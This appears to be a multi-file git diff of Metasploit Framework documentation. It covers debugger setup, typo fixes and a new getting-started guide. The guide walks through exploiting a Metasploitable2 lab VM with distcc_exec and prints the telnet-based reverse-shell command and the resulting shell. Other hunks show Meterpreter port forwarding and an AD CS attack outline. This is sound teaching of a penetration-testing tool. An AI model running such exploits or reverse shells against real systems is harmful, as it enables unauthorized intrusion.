+VSCode itself. The tool can be installed by running `gem install solargraph-rails` for the Rails integrations, which will
+also in turn install `solargraph` itself. If you just want SolarGraph without the Rails integrations, run `gem install solargraph`.
+
+The configuration file for SolarGraph itself can be found at `.solargraph.yml` within the root directory of Metasploit Framework.
+For more information on how this works and how to tweak it, please refer to <https://solargraph.org/guides/configuration>.
+
+Once the Gem files have been installed, the next step is to install the VSCode plugin. You can grab it from 
+<https://marketplace.visualstudio.com/items?itemName=castwide.solargraph>. Once this is done, run the following commands
+to ensure that SolarGraph is using the most up to date information about your code:
+
+```
+bundle install # Update all the gems
+yard gems # Create documentation files for all the gems. SolarGraph relies on YARD for a lot of info.
+yard doc -c # Create YARD docs for all files and use the cache so we don't repeat work (-c option).
+solargraph bundle # Update Solargraph documentation for bundled gems
+```
+
+Then close down VSCode and restart it again, opening up the `metasploit-framework` directory again as a project if needs be.
+This should result in the SolarGraph server starting and then taking a few minutes to index your files. Note that this
+process may occur every time you open up the `metasploit-framework` project. This is normal and to be expected.
+
+If you'd like to save yourself some time, you can have YARD automatically generate new documentation for installed Gems
+by running `yard config --gem-install-yri` which will configure YARD to automatically generate documentation whenever
+new Gems are installed.
+
+# Debugging Metasploit
+
+## Pry Debugging
+Occasionally, simply reading through Metasploit code may not be helpful. You need to actually get into the weeds and learn
+what a piece of code is doing. In these cases, it may be helpful to use `pry`, a Ruby Debugger that can be launched at
+a specific place within your code and which allows you to view the state of the program at that time,
+make adjustments as needed, and then either step through the program or continue to let it run.
+
+You can enter into an interactive debugging environment using `pry` by adding the following code
+snippet within your Metasploit module or library method:
+
+```ruby
+require 'pry'; binding.pry
+```
+
+Pry includes inbuilt commands for code navigation:
+
+- `backtrace`: Show the current call stack
+- `up` / `down`: Navigate the call stack
+- `step`: Move forward by a single execution step
+- `next`: Move forward by a single line
+- `whereami`: Show the current breakpoint location again
+- `help`: View all of the available commands and options
+
+Ruby's runtime introspection can be used to view the available methods, classes, and variables within the current Ruby environment:
+
+- `self`: To find out what the current object is
+- `self.methods`: Find all available methods
+- `self.methods.grep /send/`: Searching for a particular method that you're interested in. This can be great to explore unknown APIs.
+- `self.method(:connect).source_location`: Find out which file, and which line, defined a particular method
+- `self.class.ancestors`: For complex modules, this can be useful to see what mixins a Metasploit module is currently using
+
+To learn more about Pry, we recommend reading GitLab's guide at <https://docs.gitlab.com/ee/development/pry_debugging.html>.
+
+## Debug.gem Debugging
+Ruby 3.1 and later come with `debug.gem` installed automatically, which is the new default debugger for Ruby. It replaces
+the old `lib/debug.rb` library that was not actively being maintained and replaces it with a modern debugging library
+capable of performing many debugging actions with next to no impact on the performance of the debugged application.
+
+Whilst RubyMine does not support the `debug.gem` functionality, you can use VSCode to take advantage of `debug.gem`
+to get speedy debugging of Ruby scripts from within VSCode itself. Simply install the debugging plugin
+from <https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg>, then go to the Metasploit root directory,
+and if you have Bundler installed, run `bundle install`. This will bring in the latest version of the `debug` gem.
+
+Once this is all done, open the `metasploit-framework` folder from a cloned GitHub copy of Metasploit Framework in VSCode
+by using `File->Open Folder`. Then click `Run->Add Configuration->Ruby(rdbg)`. This will create a file at
+`<metasploit root>/.vscode/launch.json`. Replace the contents of this file with the contents of the file at
+<https://github.com/rapid7/metasploit-framework/blob/master/external/vscode/launch.json>. If you wish, you can
+optionally change the listening port from `55634` in the script to one of your choice.
+
+Finally click `Run->Start Debugging` to start debugging Metasploit Framework using VSCode. This may cause a prompt to
+appear that looks like `bundle exec ruby /home/tekwizz123/git/metasploit-framework/msfconsole`. Confirm this looks okay
+and that you are using `bundle exec ruby` to execute `msfconsole`. If all looks good, hit the `ENTER` key to confirm.
+At this point you should see Metasploit Framework open up.
+
+If you want to prevent this prompt in the future then simply remove the `"askParameters": true,` line from `launch.json`.
+
+Once in a debugging session, debug.gem supports the same commands as Pry in may cases, so the commands listed in the
+Pry section above should work in the same manner. Additionally debug.gem also supports extra commands for things such as
+tracing data. For more details refer to the command list at <https://github.com/ruby/debug#debug-command-on-the-debug-console>
+which provides a detailed list of debug.gem's supported commands. For more information on the VSCode rdbg plugin,
+refer to <https://code.visualstudio.com/docs/languages/ruby> and <https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg>.
+
+## RubyMine Debugging
+RubyMine comes with its own built in debugger that is based off of the old `lib/debug.rb` library in Ruby, however it
+has custom patches and modifications applied to it by the JetBrains team. To set it up, first clone the Git repository
+for Metasploit-Framework locally, then go `File->Open` and click on the `metasploit-framework` folder to open it as a project.
+
+Once this is done, go to `Run->Edit Configurations` and click the plus sign to add a new configuration. Select
+`Ruby`, and in the name field, enter a name that makes sense for you, such as `Metasploit Debug`. Under `Ruby Script`,
+enter the full path to `msfconsole` on your local machine. Finally, set the SDK to either `Use Project SDK` or select
+another Ruby SDK that RubyMine recognizes.
+
+You can add a Ruby SDK by going to `File->Settings->Languages and Frameworks->Ruby SDK and Gems` and clicking the plus sign.
@@ -4,7 +4,7 @@ Installers are built nightly for macOS, Windows (64-bit) and Linux.  These insta

 The following script invocation will import the Rapid7 signing key and setup the package for supported Linux and macOS systems:

-```
+```sh
 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
@@ -33,7 +33,7 @@ If you downloaded Metasploit from us, there is no cause for alarm.  We pride our
 ### Windows silent installation

 The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
-```
+```powershell
 [CmdletBinding()]
 Param(
    $DownloadURL = "https://windows.metasploit.com/metasploitframework-latest.msi",
@@ -1,7 +1,7 @@
 # Install oracle InstantClient


-InstantClient 10 is recommneded to allow you to talk with 8,9,10,&11 server versions.
+InstantClient 10 is recommended to allow you to talk with 8,9,10,&11 server versions.

 Go to <https://www.oracle.com/database/technologies/instant-client/downloads.html> and select the link corresponding to your UNIX PC's architecture. Example for Linux x64, use the Instant Client for Linux x86-64 link, which should take you to <https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html>

@@ -95,7 +95,7 @@ IPv4 Active Routing Table
 msf6 post(multi/manage/autoroute) >
 ```

-All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entires.
+All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entries.

 ```msf
 msf6 post(multi/manage/autoroute) > route flush
@@ -290,7 +290,7 @@ Active sessions
 #### Local Port Forwarding
 To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:

-```
+```msf
 meterpreter > portfwd -h
 Usage: portfwd [-h] [add | delete | list | flush] [args]

@@ -309,7 +309,7 @@ meterpreter >

 To add a port forward, use `portfwd add` and specify the `-l`, `-p` and `-r` options at a minimum to specify the local port to listen on, the report port to connect to, and the target host to connect to respectively.

-```
+```msf
 meterpreter > portfwd add -l 1090 -p 443 -r 169.254.37.128
 [*] Local TCP relay created: :1090 <-> 169.254.37.128:443
 meterpreter >
@@ -338,7 +338,7 @@ Note that you may need to edit your `/etc/hosts` file to map IP addresses to giv
 #### Listing Port Forwards and Removing Entries
 Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.

-```
+```msf
 meterpreter > portfwd delete -l 1090
 [*] Successfully stopped TCP relay on 0.0.0.0:1090
 meterpreter > portfwd list
@@ -355,7 +355,7 @@ To set up a reverse port forward, use `portfwd add -R` within a supported sessio

 For example to listen on port 9093 on a target session and have it forward all traffic to the Metasploit machine at 172.20.97.72 on port 9093 we could execute `portfwd add -R -l 4444 -L 172.20.97.73 -p 9093` as shown below, which would then cause the machine who have a session on to start listening on port 9093 for incoming connections.

-```
+```msf
 meterpreter > portfwd add -R -l 4444 -L 172.20.97.73 -p 9093
 [*] Local TCP relay created: 172.20.97.73:4444 <-> :9093
 meterpreter > netstat -a
@@ -446,7 +446,7 @@ socks5 127.0.0.1 1080

 The final final should look something like this:

-```
+```ini
 # proxychains.conf  VER 3.1
 #
 #        HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
@@ -11,12 +11,12 @@ Unfortunately, at this point in time the extension only works inside x86 and x64
 # Usage

 As with any other extension that comes with Meterpreter, loading it is very simple:
-```
+```msf
 meterpreter > use python
 Loading extension python...success.
 ```
 Once loaded, the help system shows the commands that come with the extension:
-```
+```msf
 meterpreter > help

    ... snip ...
@@ -36,7 +36,7 @@ Each of these commands is discussed in detail below.
 ## python_execute

 The `python_execute` command is the simplest of all commands that come with the extension, and provides the means to run single-shot lines of Python code, much in the same way that the normal Python interpreter functions from the command-line when using the `-c` switch. The full help for the command is as follows:
-```
+```msf
 meterpreter > python_execute -h
 Usage: python_execute <python code> [-r result var name]

@@ -50,13 +50,13 @@ OPTIONS:
    -r <opt>  Name of the variable containing the result (optional)
 ```
 A very simple example of this command is shown below:
-```
+```msf
 meterpreter > python_execute "print 'Hi, from Meterpreter!'"
 [+] Content written to stdout:
 Hi, from Meterpreter!
 ```
 Notice that any output that is written to stdout is captured by Meterpreter and returned to Metasploit so that it's visible to the user. This also happens for anything written to stderr, as shown below:
-```
+```msf
 meterpreter > python_execute "x = x + 1"
 [-] Content written to stderr:
 Traceback (most recent call last):
@@ -66,25 +66,25 @@ NameError: name 'x' is not defined
 This handy feature now only allows users to see the output of their scripts, but it also means that any errors are completely visible too.

 A more interesting example can be seen below:
-```
+```msf
 meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]"
 [+] Command executed without returning a result
 ```
 The command above executes, but nothing was printed to stdout, or to stderr, and hence nothing was captured.

-The good thing is that the Python extension is persistant across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
-```
+The good thing is that the Python extension is persistent across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
+```msf
 meterpreter > python_execute "print x"
 [+] Content written to stdout:
 [0, 5, 10, 15]
 ```
-As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` paramter, as described by the help:
-```
+As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` parameter, as described by the help:
+```msf
 meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]" -r x
 [+] x = [0, 5, 10, 15]
 ```
 Note that this command requires the first parameter to be a string that contains code that needs to be executed. However, this string can be blank, resulting in no code being executed. This means that extraction of content generated in previous calls is still possible without executing more code, or rerunning previous code snippets just to make use of the `-r` parameter:
-```
+```msf
 meterpreter > python_execute "" -r x
 [+] x = [0, 5, 10, 15]
 ```
@@ -95,7 +95,7 @@ Sometimes, single-line execution isn't enough, or is cumbersome. The `python_imp
 ## python_import

 This command allows for whole modules to be loaded from the attacker's machine an uploaded to the target interpreter. The full help is shown below:
-```
+```msf
 meterpreter > python_import -h
 Usage: python_import <-f file path> [-n mod name] [-r result var name]

@@ -114,8 +114,8 @@ OPTIONS:
 Importing of module trees is still considered a _beta_ feature, but we encourage you to use it where possible and keep us informed of any issues you may face.

 Consider the following script:
-```
-$ cat /tmp/drives.py
+```python
+# $ cat /tmp/drives.py
 import string
 from ctypes import windll

@@ -133,7 +133,7 @@ result = get_drives()
 print result
 ```
 The aim of this is to determine all the local logical drives and put the letters into a list. From there it prints that list to screen. The result of running the script is as follows:
-```
+```msf
 meterpreter > python_import -f /tmp/drives.py
 [*] Importing /tmp/drives.py ...
 [+] Content written to stdout:
@@ -146,7 +146,7 @@ This command is also intended to allow for recursive loading of modules from the
 ## python_reset

 It may get to a point where the content of the interpreter needs to be flushed. The `python_reset` command clears out all imports, libraries and global variables:
-```
+```msf
 meterpreter > python_execute "x = 100"
 [+] Command executed without returning a result
 meterpreter > python_execute "print x"
@@ -244,7 +244,7 @@ It is not possible to delete transports using the python extension as this opens

 ### Bindings example

-```
+```msf
 meterpreter > getuid
 Server username: WIN-TV01I7GG7JK\oj
 meterpreter > python_execute "import meterpreter.user; print meterpreter.user.getuid()"
@@ -8,18 +8,18 @@ Clone a new metasploit-framework.git repository:

 Go there and check out every remote branch we've got. That way, if you screw up and delete something important, you can add it back in later from this backup clone.

-````
+```
 todb@presto:~/github/todb-r7$ cd msf-backup.git
 `todb@presto:~/github/todb-r7/metasploit-framework$ for b in `git branch -r | grep -v "HEAD -> origin" | sed 's/^  origin\///'`; do git checkout -b $b --track origin/$b; done
-````
+```

 Tarball it out of the way.

-````
+```
 todb@presto:~/github/todb-r7$ cd ..
 todb@presto:~/github$ tar zxvf msf-backup.git.tar.gz
 todb@presto:~/github$ rm -rf msf-backup.git
-````
+```

 # Make a new clone

@@ -35,10 +35,10 @@ First, wipe out anything that responds to prune. Usually that's not a lot.

 Next, take a look at what's already merged and what's not. We can drop most of the merged stuff right away.

-````
+```
 mazikeen:./msf-prune$ git branch -r --merged 
 mazikeen:./msf-prune$ git branch -r --no-merged 
-````
+```

 That gives a pretty good idea of how many branches we're talking about.

@@ -46,21 +46,21 @@ That gives a pretty good idea of how many branches we're talking about.

 Here's a one-liner, lightly modified from http://stackoverflow.com/questions/2514172/listing-each-branch-and-its-last-revisions-date-in-git#2514279 which lists all remote **merged** branches in date order.

-````
+```
 mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort
-````
+```

 Count off how many you want to keep at the end, do the arithmetic, and tack on another couple pipes to catch everything that's more than two weeks old. These are the merged branches that nobody's likely to miss.

-`````
+```
 mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort | head -45 | sed "s/^.*origin\///" > /tmp/merged_to_delete.txt
-````
+```

 Pull the trigger:

-````
+```
 mazikeen:./msf-prune$ for b in `cat /tmp/merged_to_delete.txt`; do echo Deleting $b && git push origin :$b; done
-````
+```

 Note that we still have our tarball, so if we need to reinstate any of these branches, just need to re-push.

@@ -31,14 +31,14 @@ You can inspect exactly what commits are contained in this merge with the follow

 Like so:

-````
+```
 $ git log bad-merge...bad-merge~ --oneline
 3996557 Fix conflcit lib/msf/util/exe.rb
 6296c4f Merge pull request #9 from tabassassin/retab/pr/2320
 d0a3ea6 Retab changes for PR #2320
 bff7d0e Merge for retab
 4c9e6a8 Default to exe-small
-````
+```

 The syntax is a little wacky, but this is saying, "Show me all the commit hashes that occur from the `bad-merge` point to one back from `bad-merge` (in other words, from right before `bad-merge` was merged). That's what the tilde (~) means. You could also use `bad-merge^` or `bad-merge^1`, they're all equivalent.

@@ -4,9 +4,9 @@ If you're in the business of writing or collecting Metasploit modules that aren'

 You must first set up a directory structure that fits with Metasploit's expectations of path names. What this typically means is that you should first create an "exploits" directory structure, like so:

-````bash
+```bash
 mkdir -p $HOME/.msf4/modules/exploits
-````
+```

 If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll want to `mkdir` those as well.

@@ -14,9 +14,9 @@ If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll

 Modules are sorted by (somewhat arbitrary) categories. These can be anything you like; I usually use `test` or `private`, but if you are developing a module with an eye toward providing it to the main Metasploit distribution, you will want to mirror the real module path. For example:

-````bash
+```bash
 mkdir -p $HOME/.msf4/modules/exploits/windows/fileformat
-````
+```

 ... if you are developing a file format exploit for Windows.

@@ -36,7 +36,7 @@ For full details:

 If you already have msfconsole running, use a `reload_all` command to pick up your new modules. If not, just start msfconsole and they'll be picked up automatically. If you'd like to test with something generic, I have a module posted up as a gist, here: <https://gist.github.com/todb-r7/5935519>, so let's give it a shot:

-````bash
+```bash
 mkdir -p $HOME/.msf4/modules/exploits/test
 curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb
 todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
@@ -44,7 +44,7 @@ todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gis
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 100  1140    0  1140    0     0   3607      0 --:--:-- --:--:-- --:--:--  7808
-````
+```

 Then, in my msfconsole window:

@@ -4,7 +4,7 @@ Recent changes to HTTP and HTTPS communications in both Meterpreter and its stag

 The Windows API comes with two ways to talk via HTTP/S, they are [WinInet][] and [WinHTTP][]. The APIs are consumed in a similar fashion; many of the functions in each have the same interface, or are at least close enough to make a transition between the two rather trivial. However, there are some underlying differences that are important.

-The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibilty of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.
+The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibility of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.

 [WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [[Paranoid Mode|./meterpreter-paranoid-mode.md]] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.

@@ -22,7 +22,7 @@ As indicated in a [blog post on MSDN][msdn_winhttp]:

 What this means is that from Windows 7 and onwards, the underlying [WinHTTP][] implementation requires proper HTTP/1.1 support from any proxies that are used. If a proxy uses HTTP/1.0, such as Squid 2.7, and requires `Keep-Alive` support, such as NTLM authentication, then [WinHTTP][] will refuse to talk to it. Instead of downgrading, it will expect a purely RFC-compliant implementation, and instead will return a `407` error the client. This means that for Meterpreter to work, [WinHTTP][] can't be used.

-In order to avoid this issue, [extra work][wininet_fallback] has beeen done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.
+In order to avoid this issue, [extra work][wininet_fallback] has been done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.

 To sum up, Meterpreter will use [WinHTTP][] where it can. If it can't, it'll fall back to [WinInet][] _unless_ paranoid mode is enabled.

@@ -27,7 +27,7 @@ If someone has library changes that cannot be merged to master, we cannot hang o

 ## Rescuing unstable modules

-If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similiar `git checkout` to grab the file and then `git mv` it to the right spot again.
+If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similar `git checkout` to grab the file and then `git mv` it to the right spot again.

 ## Safety

@@ -1,9 +1,259 @@
 ## Getting started

-Depending on your skill level - if you have no experience with Metasploit, the following resources may be a better starting point:
+Assuming you have installed Metasploit, either with the official Rapid7 nightly installers or through Kali, you can use the `msfconsole` command to open Metasploit:

-* <https://tryhackme.com/room/rpmetasploit>
-* <http://www.offensive-security.com/metasploit-unleashed/Main_Page>
-* <https://metasploit.help.rapid7.com/docs/>
-* <https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/>
-* <https://github.com/rapid7/metasploitable3>
+```msf
+ _                                                    _
+/ \    /\         __                         _   __  /_/ __
+| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
+| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
+|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
+      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\
+
+
+       =[ metasploit v6.3.35-dev-0fc88a8050               ]
+ -- --=[ 2357 exploits - 1227 auxiliary - 413 post       ]
+ -- --=[ 1387 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]
+
+Metasploit Documentation: https://docs.metasploit.com/
+
+msf6 >
+```
+
+### Finding modules
+
+Metasploit is based around the concept of [[modules]]. The most commonly used module types are:
+
+- Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks
+- Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host
+- Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc
+- Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session.
+
+You can use the `search` command to search for modules:
+
+```msf
+msf6 > search type:auxiliary http html title tag
+
+Matching Modules
+================
+
+   #  Name                          Disclosure Date  Rank    Check  Description
+   -  ----                          ---------------  ----    -----  -----------
+   0  auxiliary/scanner/http/title                   normal  No     HTTP HTML Title Tag Content Grabber
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title
+
+msf6 >
+```
+
+You can `use` a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently
+active module:
+
+```msf
+msf6 > use auxiliary/scanner/http/title
+msf6 auxiliary(scanner/http/title) > 
+```
+
+### Running Auxiliary modules
+
+Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks. For instance, a module
+extracting the HTTP title from a server:
+
+```msf
+msf6 > use auxiliary/scanner/http/title
+msf6 auxiliary(scanner/http/title) > 
+```
+
+Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
+
+```msf
+msf6 auxiliary(scanner/http/title) > show options
+
+Module options (auxiliary/scanner/http/title):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        80               yes       The target port (TCP)
+   SHOW_TITLES  true             yes       Show the titles on the console as they are grabbed
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_NOTES  true             yes       Store the captured information in notes. Use "notes -t http.title" to view
+   TARGETURI    /                yes       The base path
+   THREADS      1                yes       The number of concurrent threads (max one per host)
+   VHOST                         no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/title) > 
+```
+
+To set a module option, use the `set command`. We will set the `RHOST` option - which represents the target host(s) that 
+the module will run against:
+
+```msf
+msf6 auxiliary(scanner/http/title) > set RHOSTS google.com
+RHOSTS => google.com
+```
+
+The `run` command will run the module against the target, showing the target's HTTP title:
+
+```msf
+msf6 auxiliary(scanner/http/title) > run
+
+[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+New in Metasploit 6 there is added support for running modules with options set as part of the run command. For instance, setting
+both `RHOSTS` and enabling `HttpTrace` functionality:
+
+```msf
+msf6 auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true 
+
+####################
+# Request:
+####################
+GET / HTTP/1.1
+Host: google.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
+
+
+####################
+# Response:
+####################
+HTTP/1.1 301 Moved Permanently
+Location: http://www.google.com/
+Content-Type: text/html; charset=UTF-8
+Server: gws
+Content-Length: 219
+
+<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
+<TITLE>301 Moved</TITLE></HEAD><BODY>
+<H1>301 Moved</H1>
+The document has moved
+<A HREF="http://www.google.com/">here</A>.
+</BODY></HTML>
+
+[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/title) > 
+```
+
+### Running exploit modules
+
+Exploit modules require a vulnerable target. It is recommended to set up your own local test environment to run modules against.
+For instance in a Virtual Machine, or with Docker. There are multiple pre-built vulnerable test environments including:
+
+- [Metasploitable2](https://docs.rapid7.com/metasploit/metasploitable-2/) 
+- [Metasploitable3](https://github.com/rapid7/metasploitable3)
+
+For instance - targeting a vulnerable Metasploitable2 VM and using the `unix/misc/distcc_exec` module:
+
+```msf
+msf6 > use unix/misc/distcc_exec
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(unix/misc/distcc_exec) > 
+```
+
+Exploit modules will generally at a minimum require the following options to be set:
+
+- `RHOST` - The remote target host address 
+- `LHOST` - The listen address. **Important** This may need to be set to your `tun0` IP address or similar, if you are connecting to your target over a VPN
+- `PAYLOAD` - The code to be executed after an exploit is successful. For instance creating a user, or a Metasploit session. Often this can be left as the default value, but may sometimes require configuration
+
+Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > options
+
+Module options (exploit/unix/misc/distcc_exec):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   3632             yes       The target port (TCP)
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(unix/misc/distcc_exec) > 
+```
+
+For this scenario you can manually set each of the required option values (`RHOST`, `LHOST`, and optionally `PAYLOAD`):
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
+rhost => 192.168.123.133
+msf6 exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
+payload => cmd/unix/reverse
+```
+
+The `run` command will run the module against the target, there is also an aliased `exploit` command which will perform the same action:
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > run
+
+[+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 192.168.123.1:4444 
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo BmpMGFX6NDVlh5h0;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "BmpMGFX6NDVlh5h0\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.133:48578) at 2023-09-21 14:42:42 +0100
+
+whoami
+daemon
+```
+
+New in Metasploit 6 there is added support for running modules with options set as part of the run command:
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse
+
+[+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 192.168.123.1:4444
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo QqL1Uzom6eBFilyL;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "QqL1Uzom6eBFilyL\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.133:52314) at 2023-09-21 13:52:40 +0100
+
+whoami
+daemon
+```
@@ -2,7 +2,7 @@
 Follow the instructions [[here|./ad-certificates/overview.md]] to set up an AD CS server
 for testing purposes.

-## Introduction to AD CS Vulnerabilities
+# Introduction to AD CS Vulnerabilities
 ```mermaid
 flowchart TD
 	escexp[Find vulnerable certificate templates\nvia ldap_esc_vulnerable_cert_finder] --> icpr[Issue certificates via icpr_cert]
@@ -13,9 +13,10 @@ flowchart TD
 	users[Request certificates on behalf of other users] --> ESC3{{ESC3}}
 	ESC2{{ESC2}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
 	ESC3{{ESC3}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
+	ad_cs_template[Reconfigure certificates via ad_cs_cert_template] -- Exploit configuration --> icpr
 ```

-The chart above showcases how one can go about attacking three common AD CS
+The chart above showcases how one can go about attacking four common AD CS
 vulnerabilities, taking advantage of various flaws in how certificate templates are
 configured on an Active Directory Certificate Server.

@@ -27,20 +28,24 @@ and finally using these certificates to authenticate to the domain as the domain
 administrator via Kerberos.

 Each certificate template vulnerability that will be discussed here has a ESC code, such
-as ESC1, ESC2, or ESC3. These ESC codes are taken from the original whitepaper that
+as ESC1, ESC2. These ESC codes are taken from the original whitepaper that
 SpecterOps published which popularized these certificate template attacks, known as
 [Certified
